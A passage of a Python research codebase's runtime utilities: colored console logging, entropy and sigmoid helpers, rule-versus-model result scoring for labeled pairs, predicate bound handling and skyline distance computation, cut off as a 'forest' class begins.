runtime.console.color.BLACK\r\n if title != None:\r\n icon = ''\r\n title_lower = str(title).lower()\r\n if 'save' in title_lower:\r\n icon = '💾'\r\n elif 'error' in title_lower or style == runtime.console.styles.EXCEPTION:\r\n icon = '⚠'\r\n elif style == runtime.console.styles.TOP:\r\n icon = '🎄🎊🔮🔮🔮'\r\n elif style == runtime.console.styles.PERIOD:\r\n icon = '📁'\r\n else:\r\n icon = '📧'\r\n showtext = str(title) + ' (@' + functionname + ', ' + str(functionlineno) + ') █▓▒░'\r\n if style == runtime.console.styles.TOP:\r\n showtext_unicodelist = list(showtext)\r\n for eachindex in range(0, len(showtext_unicodelist)):\r\n showtext_unicodelist[eachindex] = np.random.choice(runtime.console.color.COLORS, 1, False, None)[0] + showtext_unicodelist[eachindex]\r\n showtext_unicodelist.append(header1)\r\n showtext = ''.join(showtext_unicodelist)\r\n print(header1 + icon + ' ' + showtext + ' ' * 10 + runtime.console.color.END)\r\n else:\r\n print(header1 + icon + ' ' + showtext + ' ' * 10 + runtime.console.color.END)\r\n if content != None:\r\n if type(content) == dict:\r\n splitmark = ' '\r\n thecontent = ''\r\n for eachcontentitemname in content:\r\n contentvalue = content[eachcontentitemname]\r\n if runtime.isnumber(contentvalue) == True and contentvalue != 0 and math.isnan(contentvalue) == False:\r\n if contentvalue < 0:\r\n contentvalue = contentvalue * (-1)\r\n if contentvalue != 1:\r\n for eachspecialvalue in metainfo.top.specialvalue:\r\n specialtag = metainfo.top.specialvalue[eachspecialvalue]\r\n if contentvalue == eachspecialvalue:\r\n contentvalue = specialtag\r\n break\r\n elif math.isinf(contentvalue) == True:\r\n contentvalue = '∞'\r\n break\r\n else:\r\n variation_contentvalue = int(math.log(contentvalue, eachspecialvalue))\r\n if math.pow(eachspecialvalue, variation_contentvalue) == contentvalue:\r\n contentvalue = specialtag + ' ^ ' + str(variation_contentvalue)\r\n break\r\n if content[eachcontentitemname] < 0:\r\n contentvalue = ' — ' + str(contentvalue)\r\n str_eachcontentitemname = str(eachcontentitemname)\r\n if type(contentvalue) == bool or 'polar' == str_eachcontentitemname:\r\n if contentvalue == True:\r\n header2_True = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.DARKGREEN\r\n header3_True = runtime.console.color.END + runtime.console.color.GREEN\r\n thecontent += (header2_True + str_eachcontentitemname + ':' + header3_True + ' ' + str(contentvalue) + runtime.console.color.END + splitmark)\r\n else:\r\n header2_False = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.DARKRED\r\n header3_False = runtime.console.color.END + runtime.console.color.RED\r\n thecontent += (header2_False + str_eachcontentitemname + ':' + header3_False + ' ' + str(contentvalue) + runtime.console.color.END + splitmark)\r\n elif metainfo.top.GROUND_TRUTH == str_eachcontentitemname:\r\n header2_GT = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.DARKGREEN\r\n header3_GT = runtime.console.color.END + runtime.console.color.DARKCYAN\r\n thecontent += (header2_GT + str_eachcontentitemname + ':' + header3_GT + ' ' + str(contentvalue) + runtime.console.color.END + splitmark)\r\n elif 'weight' == str_eachcontentitemname:\r\n header2_GT = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.DARKPURPLE\r\n header3_GT = runtime.console.color.END + runtime.console.color.PURPLE\r\n thecontent += (header2_GT + str_eachcontentitemname + ':' + header3_GT + ' ' + str(contentvalue) + runtime.console.color.END + splitmark)\r\n elif '√' in str_eachcontentitemname:\r\n header2_True = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.DARKGREEN\r\n header3_True = runtime.console.color.END + runtime.console.color.GREEN\r\n thecontent += (header2_True + str_eachcontentitemname + ':' + header3_True + ' ' + str(contentvalue) + runtime.console.color.END + splitmark)\r\n elif '×' in str_eachcontentitemname:\r\n header2_False = runtime.console.color.END + runtime.console.color.BACKGROUND + runtime.console.color.DARKRED\r\n header3_False = runtime.console.color.END + runtime.console.color.RED\r\n thecontent += (header2_False + str_eachcontentitemname + ':' + header3_False + ' ' + str(contentvalue) + runtime.console.color.END + splitmark)\r\n else:\r\n thecontent += (header2 + str_eachcontentitemname + ':' + header3 + ' ' + str(contentvalue) + runtime.console.color.END + splitmark)\r\n content = thecontent[0: len(thecontent) - len(splitmark)] + ' .'\r\n sys.stdout.write(header3 + str(content))\r\n print(runtime.console.color.END)\r\n sys.stdout.flush()\r\n\r\n @staticmethod\r\n def print(level, style, highlightindexes, * content):\r\n icon = None\r\n if level == 0:\r\n icon = runtime.console.color.BLUE + '💎 ' + runtime.console.color.END\r\n else:\r\n icon = '📝 '\r\n output = runtime.console.color.END + ' ' * level + icon\r\n for eachcontentindex in range(0, len(content)):\r\n currentoutput = runtime.console.color.END\r\n if highlightindexes != None and eachcontentindex in highlightindexes:\r\n if style == runtime.console.styles.INFO:\r\n currentoutput = runtime.console.color.END + runtime.console.color.DARKPURPLE\r\n else:\r\n if style == runtime.console.styles.STRESS:\r\n currentoutput = runtime.console.color.END + runtime.console.color.YELLOW\r\n else:\r\n if style == runtime.console.styles.OUTLOOK:\r\n currentoutput = runtime.console.color.END + runtime.console.color.DARKCYAN\r\n else:\r\n if style == runtime.console.styles.REPORT:\r\n currentoutput = runtime.console.color.END + runtime.console.color.BLUE\r\n else:\r\n if style == runtime.console.styles.CORRECTION:\r\n currentoutput = runtime.console.color.END + runtime.console.color.DARKGREEN\r\n else:\r\n if style == runtime.console.styles.EXCEPTION:\r\n currentoutput = runtime.console.color.END + runtime.console.color.RED\r\n currentoutput += (str(content[eachcontentindex]) + ' ')\r\n output += currentoutput\r\n output += runtime.console.color.END\r\n print(output)\r\n\r\n @staticmethod\r\n def uniforminterval(intervalcount):\r\n allintervals = []\r\n step = float(1) / intervalcount\r\n previousleft = None\r\n previousright = 0\r\n currentleft = None\r\n currentright = None\r\n for intervalindex in range(0, intervalcount):\r\n interval = []\r\n currentleft = previousright\r\n currentright = currentleft + step\r\n if intervalindex == intervalcount - 1:\r\n currentright = 1 + metainfo.top.SMALL_VALUE\r\n previousleft = currentleft\r\n previousright = currentright\r\n allintervals.append([currentleft, currentright])\r\n return allintervals\r\n\r\n @staticmethod\r\n def entropy(probability):\r\n if type(probability) == np.float64 or type(probability) == np.float32 or type(probability) == float or type(probability) == int:\r\n if math.isinf(probability) == True:\r\n return probability\r\n else:\r\n if probability <= 0 or probability >= 1:\r\n return 0\r\n else:\r\n return 0 - (probability * math.log(probability, 2) + (1 - probability) * math.log((1 - probability), 2))\r\n else:\r\n if type(probability) == list:\r\n entropyoflist = []\r\n for eachprobability in probability:\r\n entropyoflist.append(runtime.entropy(eachprobability))\r\n return entropyoflist\r\n else:\r\n return None\r\n\r\n @staticmethod\r\n def isnan(x):\r\n return np.isnan(x) or math.isnan(x)\r\n\r\n @staticmethod\r\n def probabilitypolar(probability):\r\n if type(probability) == np.float64 or type(probability) == np.float32 or type(probability) == float or type(probability) == int:\r\n if probability >= 0.5:\r\n return 1\r\n else:\r\n if probability < 0.5:\r\n return 0\r\n else:\r\n if runtime.isnan(probability) == True:\r\n return math.nan\r\n else:\r\n return None\r\n\r\n @staticmethod\r\n def weightresultcorrect(finalweight, inpair, tolabeljudge):\r\n from source import fg\r\n ruleweight = fg.pair.inferenceresult.NOT_AVAILABLE\r\n GMLweight = None\r\n ruleresult = fg.pair.inferenceresult.NOT_AVAILABLE\r\n finalresult = None\r\n if finalweight >= 0 and inpair.truthlabel == 1 or finalweight < 0 and inpair.truthlabel == 0:\r\n finalresult = True\r\n else:\r\n finalresult = False\r\n if len(inpair.rules) > 0:\r\n ruleweight = inpair.ruleweight(detailed=tolabeljudge)\r\n if tolabeljudge == True:\r\n for eachrule in ruleweight:\r\n if inpair in eachrule.truth_correcting_correct:\r\n if finalresult == True:\r\n eachrule.actual_correcting[1][0] += 1\r\n elif finalresult == False:\r\n eachrule.actual_correcting[1][1] -= 1\r\n elif inpair in eachrule.truth_correcting_misjudge:\r\n if finalresult == True:\r\n eachrule.actual_correcting[2][0] += 1\r\n elif finalresult == False:\r\n eachrule.actual_correcting[2][1] -= 1\r\n eachrule.actual_correcting[0] = eachrule.actual_correcting[1][0] + eachrule.actual_correcting[2][1]\r\n ruleweight = sum(ruleweight.values())\r\n GMLweight = finalweight - ruleweight\r\n if ruleweight >= 0 and inpair.truthlabel == 1 or ruleweight < 0 and inpair.truthlabel == 0:\r\n ruleresult = True\r\n else:\r\n ruleresult = False\r\n else:\r\n GMLweight = finalweight\r\n GMLresult = None\r\n if GMLweight >= 0 and inpair.truthlabel == 1 or GMLweight < 0 and inpair.truthlabel == 0:\r\n GMLresult = True\r\n else:\r\n GMLresult = False\r\n inferenceresult = None\r\n if ruleresult == fg.pair.inferenceresult.NOT_AVAILABLE:\r\n if finalresult == True:\r\n inferenceresult = fg.pair.inferenceresult.GMLONLY_RIGHT\r\n else:\r\n inferenceresult = fg.pair.inferenceresult.GMLONLY_WRONG\r\n else:\r\n if GMLresult == True and ruleresult == True:\r\n inferenceresult = fg.pair.inferenceresult.BOTH_RIGHT\r\n elif GMLresult == False and ruleresult == False:\r\n inferenceresult = fg.pair.inferenceresult.BOTH_WRONG\r\n elif finalresult == True:\r\n if GMLresult == False and ruleresult == True:\r\n inferenceresult = fg.pair.inferenceresult.RULE_CORRECT\r\n elif GMLresult == True and ruleresult == False:\r\n inferenceresult = fg.pair.inferenceresult.RULE_LEAN_MISJUDGE\r\n elif finalresult == False:\r\n if GMLresult == False and ruleresult == True:\r\n inferenceresult = fg.pair.inferenceresult.RULE_LEAN_CORRECT\r\n elif GMLresult == True and ruleresult == False:\r\n inferenceresult = fg.pair.inferenceresult.RULE_MISJUDGE\r\n return inferenceresult, ruleweight\r\n\r\n @staticmethod\r\n def sgmlresultcorrect(finalweight, inpair):\r\n from source import fg\r\n if inpair.ugmllabel == None:\r\n return fg.pair.inferenceresult.NOT_AVAILABLE\r\n else:\r\n finalresult = finalweight >= 0 and inpair.truthlabel == 1 or finalweight < 0 and inpair.truthlabel == 0\r\n ugmlresult = inpair.ugmllabel == inpair.truthlabel\r\n ruleresult = fg.pair.inferenceresult.NOT_AVAILABLE\r\n if len(inpair.rules) > 0:\r\n ruleweight = inpair.ruleweight(detailed=False)\r\n if ruleweight >= 0 and inpair.truthlabel == 1 or ruleweight < 0 and inpair.truthlabel == 0:\r\n ruleresult = True\r\n else:\r\n ruleresult = False\r\n inferenceresult = None\r\n if finalresult == True:\r\n if ugmlresult == True:\r\n if inpair.truthlabel == 0:\r\n inferenceresult = fg.pair.inferenceresult.USGML_BOTH_RIGHT_0\r\n else:\r\n inferenceresult = fg.pair.inferenceresult.USGML_BOTH_RIGHT_1\r\n else:\r\n if inpair.truthlabel == 0:\r\n if ruleresult == True:\r\n inferenceresult = fg.pair.inferenceresult.SGML_RULE_CORRECT_0\r\n elif ruleresult == None:\r\n inferenceresult = fg.pair.inferenceresult.SGML_CORRECT_0\r\n else:\r\n inferenceresult = fg.pair.inferenceresult.SGML_CORRECT_0\r\n else:\r\n if ruleresult == True:\r\n inferenceresult = fg.pair.inferenceresult.SGML_RULE_CORRECT_1\r\n elif ruleresult == None:\r\n inferenceresult = fg.pair.inferenceresult.SGML_CORRECT_1\r\n else:\r\n inferenceresult = fg.pair.inferenceresult.SGML_CORRECT_1\r\n else:\r\n if ugmlresult == True:\r\n if inpair.truthlabel == 0:\r\n if ruleresult == False:\r\n inferenceresult = fg.pair.inferenceresult.SGML_RULE_MISJUDGE_0\r\n elif ruleresult == None:\r\n inferenceresult = fg.pair.inferenceresult.SGML_MISJUDGE_0\r\n else:\r\n inferenceresult = fg.pair.inferenceresult.SGML_MISJUDGE_0\r\n else:\r\n if ruleresult == False:\r\n inferenceresult = fg.pair.inferenceresult.SGML_RULE_MISJUDGE_1\r\n elif ruleresult == None:\r\n inferenceresult = fg.pair.inferenceresult.SGML_MISJUDGE_1\r\n else:\r\n inferenceresult = fg.pair.inferenceresult.SGML_MISJUDGE_1\r\n else:\r\n if inpair.truthlabel == 0:\r\n inferenceresult = fg.pair.inferenceresult.USGML_BOTH_WRONG_0\r\n else:\r\n inferenceresult = fg.pair.inferenceresult.USGML_BOTH_WRONG_1\r\n return inferenceresult\r\n\r\n\r\n\r\n @staticmethod\r\n def sigmoid(weight):\r\n #i.e. math.exp(weight)/(1+ math.exp(weight))\r\n #return float(1) / float(1 + math.exp((-1) * weight))\r\n return expit(weight)\r\n\r\n @staticmethod\r\n def weight2probabilityentropy(weight):\r\n probability = runtime.sigmoid(weight)\r\n entropy = runtime.entropy(probability)\r\n return weight, probability, entropy\r\n\r\n @staticmethod\r\n def sublist(thelist, theinds):\r\n sublist = []\r\n for eachind in theinds:\r\n sublist.append(thelist[eachind])\r\n return sublist\r\n\r\n @staticmethod\r\n def searchFile(searchpath, filenamepattern):\r\n def cmp_filename(a, b):\r\n if len(a) == len(b):\r\n return runtime.cmp(a, b)\r\n else:\r\n return runtime.cmp(len(a), len(b))\r\n matchedFile = []\r\n for root, dirs, files in os.walk(searchpath):\r\n for file in files:\r\n if re.match(filenamepattern, file):\r\n fname = os.path.abspath(os.path.join(root, file))\r\n matchedFile.append(fname)\r\n matchedFile.sort(key=functools.cmp_to_key(cmp_filename), reverse=False)\r\n return matchedFile\r\n\r\n class hashabledict(dict):\r\n def __key(self):\r\n return tuple((k, self[k]) for k in sorted(self))\r\n def __hash__(self):\r\n return hash(self.__key())\r\n def __eq__(self, other):\r\n return self.__key() == other.__key()\r\n\r\n class hashableset(set):\r\n def __hash__(self):\r\n return hash(frozenset(self))\r\n\r\n class hashablelist(list):\r\n def __hash__(self):\r\n return hash(frozenset(self))\r\n\r\n @staticmethod\r\n def completeset_redundant(values, polar):\r\n values = list(values)\r\n values.sort(reverse=False)\r\n if polar == 0:\r\n values = values[0: len(values) - 1]\r\n else:\r\n values = values[1: len(values)]\r\n return values\r\n\r\n @staticmethod\r\n def equaldistance_choice(thelist, choicenumber):\r\n if choicenumber == 1:\r\n return [thelist[int(len(thelist) / 2)]]\r\n else:\r\n start = 0\r\n stop = len(thelist) - 1\r\n choices = np.linspace(start, stop, num=choicenumber, endpoint=True, retstep=False, dtype=int)\r\n choicelist = list(set(np.array(thelist)[choices]))\r\n return choicelist\r\n\r\n @staticmethod\r\n def combine(form_values, all_form_values_values, polar, mutation_basepredicates, mutation):\r\n initindicator = runtime.hashabledict({str(metainfo.top.INDETERMINATE):metainfo.top.INDETERMINATE})\r\n previouscombinations = runtime.hashabledict({initindicator:all_form_values_values})\r\n combinations = None\r\n for eachform in form_values:\r\n combinations = runtime.hashabledict()\r\n eachformvalues = form_values[eachform]\r\n eachformvalues_completeset_redundant = runtime.completeset_redundant(eachformvalues.keys(), polar)\r\n mutation_rangevalue = None\r\n if mutation_basepredicates == None:\r\n mutation_rangevalue = [min(eachformvalues_completeset_redundant), max(eachformvalues_completeset_redundant)]\r\n else:\r\n for eachpredicate in mutation_basepredicates:\r\n if eachpredicate.feature == eachform:\r\n mutation_rangevalue = eachpredicate.mutationrange(mutation=mutation)\r\n break\r\n for eachformvalue in eachformvalues.keys():\r\n if eachformvalue >= mutation_rangevalue[0] and eachformvalue <= mutation_rangevalue[1]:\r\n if eachformvalue in eachformvalues_completeset_redundant:\r\n eachformvalue_values = set()\r\n if polar == 0:\r\n for polaroperation_eachformvalue in eachformvalues:\r\n if polaroperation_eachformvalue <= eachformvalue:\r\n eachformvalue_values.update(eachformvalues[polaroperation_eachformvalue])\r\n else:\r\n for polaroperation_eachformvalue in eachformvalues:\r\n if polaroperation_eachformvalue >= eachformvalue:\r\n eachformvalue_values.update(eachformvalues[polaroperation_eachformvalue])\r\n for eachpreviouscombination in previouscombinations:\r\n eachextendcombination = runtime.hashabledict(eachpreviouscombination)\r\n eachextendcombination[eachform] = eachformvalue\r\n eachextendformvalue_values = set(previouscombinations[eachpreviouscombination]).intersection(eachformvalue_values)\r\n combinations[eachextendcombination] = eachextendformvalue_values\r\n else:\r\n for eachpreviouscombination in previouscombinations:\r\n eachextendcombination = runtime.hashabledict(eachpreviouscombination)\r\n eachextendformvalue_values = set(previouscombinations[eachpreviouscombination])\r\n combinations[eachextendcombination] = eachextendformvalue_values\r\n previouscombinations = combinations\r\n copycombinations = runtime.hashabledict(combinations)\r\n combinations = runtime.hashabledict()\r\n for eachcombination in copycombinations:\r\n thepairs = copycombinations[eachcombination]\r\n del eachcombination[str(metainfo.top.INDETERMINATE)]\r\n if len(eachcombination) > 0:\r\n combinations[eachcombination] = thepairs\r\n combinations_predicates = {}\r\n op = None\r\n if polar == 0:\r\n op = runtime.predicate.op.lesseq\r\n else:\r\n op = runtime.predicate.op.largereq\r\n for eachcombination in combinations:\r\n current_combinations_predicates = runtime.hashableset()\r\n for eachfeature in eachcombination:\r\n eachfeaturevalue = eachcombination[eachfeature]\r\n current_combinations_predicates.add(runtime.predicate(feature=eachfeature, op=op, value=eachfeaturevalue, valueex=None))\r\n combinations_predicates[current_combinations_predicates] = combinations[eachcombination]\r\n return combinations_predicates\r\n\r\n class predicate:\r\n\r\n class op:\r\n lesseq = '≤'\r\n largereq = '≥'\r\n eq = '='\r\n oppose = {lesseq:largereq, largereq:lesseq}\r\n\r\n def __init__(self, feature, op, value, valueex = None):\r\n self.feature = feature\r\n self.op = op\r\n self.value = value\r\n self.valueex = valueex\r\n if self.value == None:\r\n self.value = self.valueex\r\n self.valueex = None\r\n if self.valueex != None:\r\n if self.value == self.valueex:\r\n self.op = runtime.predicate.op.eq\r\n self.valueex = None\r\n else:\r\n if self.op == runtime.predicate.op.largereq:\r\n self.value = max(value, valueex)\r\n self.valueex = min(value, valueex)\r\n else:\r\n self.value = min(value, valueex)\r\n self.valueex = max(value, valueex)\r\n if runtime.isnumber(self.value):\r\n self.value = float(self.value)\r\n if runtime.isnumber(self.valueex):\r\n self.valueex = float(self.valueex)\r\n assert(self.value != metainfo.top.NONE_VALUE and self.valueex != metainfo.top.NONE_VALUE)\r\n\r\n def print(self):\r\n if self.valueex == None:\r\n description = str(self.feature) + ' ' + str(self.op) + ' ' + str(runtime.round(self.value))\r\n else:\r\n description = str(runtime.round(self.value)) + ' ' + str(self.op) + ' ' + str(self.feature) + ' ' + str(self.op) + ' ' + str(runtime.round(self.valueex))\r\n return description\r\n\r\n def singlebound(self, op):\r\n if self.valueex == None:\r\n return\r\n else:\r\n assert(op == runtime.predicate.op.lesseq or op == runtime.predicate.op.largereq)\r\n if self.op in runtime.predicate.op.lesseq:\r\n if op == runtime.predicate.op.lesseq:\r\n self.value = self.valueex\r\n self.valueex = None\r\n else:\r\n self.op = runtime.predicate.op.oppose[self.op]\r\n self.valueex = None\r\n else:\r\n if op == runtime.predicate.op.largereq:\r\n self.value = self.valueex\r\n self.valueex = None\r\n else:\r\n self.op = runtime.predicate.op.oppose[self.op]\r\n self.valueex = None\r\n\r\n def isconform(self, featurevalue):\r\n # __init__ requires assert(self.value != metainfo.top.NONE_VALUE and self.valueex != metainfo.top.NONE_VALUE)\r\n if featurevalue == metainfo.top.NONE_VALUE:\r\n return False\r\n if self.valueex == None:\r\n if self.op == runtime.predicate.op.eq:\r\n return featurevalue == self.value\r\n elif self.op == runtime.predicate.op.lesseq:\r\n return featurevalue <= self.value\r\n elif self.op == runtime.predicate.op.largereq:\r\n return featurevalue >= self.value\r\n else:\r\n if self.op == runtime.predicate.op.lesseq:\r\n return self.value <= featurevalue and featurevalue <= self.valueex\r\n elif self.op == runtime.predicate.op.largereq:\r\n return self.value >= featurevalue and featurevalue >= self.valueex\r\n\r\n @staticmethod\r\n def combine(predicates_list):\r\n refer_features = {}\r\n for each_predicates in predicates_list:\r\n feature = each_predicates.feature\r\n op = each_predicates.op\r\n value = each_predicates.value\r\n valueex = each_predicates.valueex\r\n if feature not in refer_features:\r\n refer_features[feature] = [None, None]\r\n bound = refer_features[feature]\r\n if op == runtime.predicate.op.eq:\r\n if bound[0] == None or bound[0] <= value:\r\n bound[0] = value\r\n if bound[1] == None or bound[1] >= value:\r\n bound[1] = value\r\n else:\r\n if op == runtime.predicate.op.largereq:\r\n if valueex != None:\r\n if bound[0] == None or bound[0] <= valueex:\r\n bound[0] = valueex\r\n if bound[1] == None or bound[1] >= value:\r\n bound[1] = value\r\n else:\r\n if bound[0] == None or bound[0] <= value:\r\n bound[0] = value\r\n else:\r\n if valueex != None:\r\n if bound[0] == None or bound[0] <= value:\r\n bound[0] = value\r\n if bound[1] == None or bound[1] >= valueex:\r\n bound[1] = valueex\r\n else:\r\n if bound[1] == None or bound[1] >= value:\r\n bound[1] = value\r\n predicates_list = []\r\n for each_feature in refer_features:\r\n newpredicate = None\r\n bound = refer_features[each_feature]\r\n if bound[0] != None and bound[1] != None:\r\n if bound[0] < bound[1]:\r\n if op == runtime.predicate.op.lesseq:\r\n newpredicate = runtime.predicate(each_feature, runtime.predicate.op.lesseq, bound[0], bound[1])\r\n else:\r\n newpredicate = runtime.predicate(each_feature, runtime.predicate.op.largereq, bound[1], bound[0])\r\n newpredicate.singlebound(op)\r\n elif bound[0] == bound[1]:\r\n newpredicate = runtime.predicate(each_feature, runtime.predicate.op.eq, bound[0], None)\r\n else:\r\n return None\r\n elif bound[0] != None and bound[1] == None:\r\n if op == runtime.predicate.op.largereq:\r\n newpredicate = runtime.predicate(each_feature, runtime.predicate.op.largereq, bound[0], None)\r\n newpredicate.singlebound(runtime.predicate.op.largereq)\r\n elif bound[0] == None and bound[1] != None:\r\n if op == runtime.predicate.op.lesseq:\r\n newpredicate = runtime.predicate(each_feature, runtime.predicate.op.lesseq, bound[1], None)\r\n newpredicate.singlebound(runtime.predicate.op.lesseq)\r\n if newpredicate == None:\r\n predicates_list = None\r\n break\r\n predicates_list.append(newpredicate)\r\n return predicates_list\r\n\r\n @staticmethod\r\n def issmallerthan(predicates_1, predicates_2):\r\n features_1 = set([eachpredicate.feature for eachpredicate in predicates_1])\r\n features_2 = set([eachpredicate.feature for eachpredicate in predicates_2])\r\n if len(features_1.intersection(features_2)) == len(features_2):\r\n predicates_12 = list(predicates_1) + list(predicates_2)\r\n predicates = runtime.predicate.combine(predicates_12)\r\n if predicates != None and set(predicates) == set(predicates_1):\r\n return True\r\n else:\r\n return False\r\n else:\r\n return False\r\n\r\n def mutationrange(self, mutation):\r\n thebounds = None\r\n if self.valueex != None:\r\n thebounds = [min(self.value, self.valueex), max(self.value, self.valueex)]\r\n if mutation != None:\r\n thebounds = [thebounds[0] - mutation[0], thebounds[1] + mutation[1]]\r\n elif mutation == None:\r\n thebounds = [self.value, self.value]\r\n else:\r\n thebounds = [self.value - mutation[0], self.value + mutation[1]]\r\n return thebounds\r\n\r\n\r\n def __eq__(self, another):\r\n if type(self) == type(another) and self.feature == another.feature and self.op == another.op and self.value == another.value and self.valueex == another.valueex:\r\n return True\r\n else:\r\n return False\r\n\r\n def __hash__(self):\r\n return hash(self.print())\r\n\r\n class skyline:\r\n\r\n @staticmethod\r\n def nonevalueprocess(local_conform_map, diff_metafeature_indexes, polar, monotone_nonevalue_transformer):\r\n needprocess_notallsame = []\r\n for eachfeatureindex in range(0, local_conform_map.shape[1]):\r\n itemset = list(set(local_conform_map[:, eachfeatureindex]))\r\n if len(itemset) == 1 and (runtime.isnan(itemset[0])):\r\n needprocess_notallsame.append(eachfeatureindex)\r\n # SIM: NONE_VALUE = Not relevant is safety.\r\n # DIFF for polar 0: != NONE_VALUE safety, for polar 1: != NONE_VALUE is skyline to verify to polar 0 rule, i.e. = NONE_VALUE is safety.\r\n # WaiCmp uses all unknown values in pair as NONE_VALUE, therefore can be trusted as safety.\r\n for eachindex in range(0, local_conform_map.shape[1]):\r\n npwhere_NONE_VALUE = np.where(local_conform_map[:, eachindex] == metainfo.top.NONE_VALUE)[0].tolist()\r\n npwhere_NONE_VALUE = [npwhere_NONE_VALUE, eachindex]\r\n if polar == 0:\r\n if eachindex not in diff_metafeature_indexes:\r\n local_conform_map[tuple(npwhere_NONE_VALUE)] = monotone_nonevalue_transformer[eachindex].min # no sim: safety\r\n else:\r\n local_conform_map[tuple(npwhere_NONE_VALUE)] = monotone_nonevalue_transformer[eachindex].min # no diff: skyline or always safety.\r\n else:\r\n if eachindex not in diff_metafeature_indexes:\r\n local_conform_map[tuple(npwhere_NONE_VALUE)] = monotone_nonevalue_transformer[eachindex].max # no sim: safety\r\n else:\r\n local_conform_map[tuple(npwhere_NONE_VALUE)] = monotone_nonevalue_transformer[eachindex].max # no diff: safety\r\n\r\n @staticmethod\r\n def isinside(base, aim, polar):\r\n if polar == 0:\r\n return np.all(aim <= base)\r\n else:\r\n return np.all(aim >= base)\r\n\r\n @staticmethod\r\n def distance(q, skylines, smallerprefer, w):\r\n def cost(q, p, w):\r\n return np.dot(w, np.fabs(q - p))\r\n def SP(q, SKY):\r\n dim = SKY.shape[1]\r\n m = SKY.shape[0]\r\n P = set()\r\n if dim == 1:\r\n for i in range(1, m + 1):\r\n P.add(runtime.hashablelist(SKY[i - 1, :]))\r\n elif dim == 2:\r\n # sort points in SKY in the ascending order on dimension D1;\r\n sortindexes = np.argsort(SKY[:, 0])\r\n s = [None] * (m + 1)\r\n for i in range(1, m + 1):\r\n s[i] = SKY[sortindexes[i - 1], :]\r\n for i in range(1, m + 2):\r\n if i == 1:\r\n P.add(runtime.hashablelist([q[0], s[1][1]]))\r\n elif i == m + 1:\r\n P.add(runtime.hashablelist([s[m][0], q[1]]))\r\n else:\r\n P.add(runtime.hashablelist([s[i - 1][0], s[i][1]]))\r\n else:\r\n diversityvalues = [None] * dim\r\n diversityvalues_len = [None] * dim\r\n for eachdim in range(0, dim):\r\n diversityvalues[eachdim] = list(set(SKY[:, eachdim]))\r\n diversityvalues_len[eachdim] = len(diversityvalues[eachdim])\r\n k = np.argmin(diversityvalues_len)\r\n diversityvalues[k].sort(reverse=True)\r\n l = diversityvalues_len[k]\r\n S = [None] * (l + 2)\r\n Sk_value = [None] * (l + 2)\r\n SKY_k = SKY[:, k]\r\n for i in range(1, l + 1):\r\n Sk_value[i] = diversityvalues[k][i - 1]\r\n _Si = SKY[np.where(SKY_k == Sk_value[i])]\r\n S[i] = set()\r\n _Si.tolist()\r\n for each in _Si:\r\n S[i].add(runtime.hashablelist(each))\r\n S[l + 1] = set()\r\n S_lp1_specialcase = runtime.hashablelist(q)\r\n S[l + 1].add(S_lp1_specialcase)\r\n Sk_value[l + 1] = S_lp1_specialcase[k]\r\n Pi = [None] * (l + 2)\r\n projectindexes = list(range(0, dim))\r\n projectindexes.remove(k)\r\n p = q[projectindexes]\r\n Pi[1] = set()\r\n Pi[1].add(runtime.hashablelist(p))\r\n P = set()\r\n P_adding = []\r\n for eachpp in Pi[1]:\r\n P_adding.append(eachpp)\r\n recover_k = [Sk_value[1]] * len(P_adding)\r\n P_adding = np.insert(P_adding, k, recover_k, axis=1)\r\n for eachadding in P_adding:\r\n P.add(runtime.hashablelist(eachadding))\r\n proj_q = q[projectindexes]\r\n SS = set()\r\n for i in range(2, l + 2):\r\n SS.update(S[i - 1])\r\n _SS = np.array(list(SS), ndmin=2)\r\n df = pd.DataFrame(_SS, columns=list(range(dim)))\r\n mask = paretoset(df, sense=['max'] * dim, distinct=True, use_numba=True)\r\n SS = set()\r\n for eachmaskindex in range(0, len(mask)):\r\n if mask[eachmaskindex] == 1:\r\n SS.add(runtime.hashablelist(_SS[eachmaskindex, :]))\r\n proj_SS= np.array(_SS)[:, projectindexes]\r\n Pi[i] = SP(proj_q, proj_SS)\r\n P_adding = []\r\n for eachpp in Pi[i - 1]:\r\n # larger i smaller Si[k], distance cost prefers smaller and local optimal points are not dominated as Margins.\r\n if eachpp not in Pi[i]:\r\n P_adding.append(eachpp)\r\n # Not in condition, not always not empty.\r\n if len(P_adding) > 0:\r\n recover_k = [Sk_value[i]] * len(P_adding)\r\n P_adding = np.insert(P_adding, k, recover_k, axis=1)\r\n for each in P_adding:\r\n P.add(runtime.hashablelist(each))\r\n return P\r\n if skylines.shape[0] == 0:\r\n return 0\r\n else:\r\n skylines = np.unique(skylines, axis=0)\r\n q = np.array(q)\r\n if smallerprefer == True:\r\n q = q * (-1)\r\n skylines = skylines * (-1)\r\n qp = SP(q=q, SKY=skylines)\r\n mincost = math.inf\r\n for eachqp in qp:\r\n eachqp = np.array(eachqp)\r\n thiscost = cost(q, eachqp, w)\r\n if thiscost < mincost:\r\n mincost = thiscost\r\n return mincost\r\n\r\n class indexes_transformer:\r\n\r\n def __init__(self, sub_indexes):\r\n self.subindexes = []\r\n for each_sub_index in sub_indexes:\r\n self.subindexes.append(np.array(each_sub_index))\r\n\r\n def fullindexes(self, subindexes):\r\n fullindexes = []\r\n for eachsubindex_index in range(0, len(subindexes)):\r\n fullindexes.append(self.subindexes[eachsubindex_index][subindexes[eachsubindex_index]])\r\n return fullindexes\r\n\r\n @staticmethod\r\n def combine(indexes_lists):\r\n thecombine = []\r\n for each_axis_index in range(0, len(indexes_lists[0])):\r\n thecombine.append([])\r\n for each_index_list in indexes_lists:\r\n for each_axis_index in range(0, len(each_index_list)):\r\n thecombine[each_axis_index] += list(each_index_list[each_axis_index])\r\n return thecombine\r\n\r\n op_index_colon = slice(None)\r\n type_None = type(None)\r\n\r\n @staticmethod\r\n def isNone(object):\r\n if object is None:\r\n return True\r\n else:\r\n return False\r\n\r\n @staticmethod\r\n def isArrayEmpty(array):\r\n return np.array(array).size == 0\r\n\r\n class forest:\r\n\r\n def __init__(self, balance, mainmap_knowledgeupdating, labelindex, splitters, polar, weight, probability, confidence_coefficient, premilinary_condition_predicates, nondirectional_map = None, conform_map = None, roottrees = None):\r\n # map columns: [ UNITFEATURE TABLES, GML LABEL, PROBE LABEL ] ~ [ features (specified splitters range), labels (specified map index, to indicate both labels and Unlabeled) ]\r\n # main map for knowledge 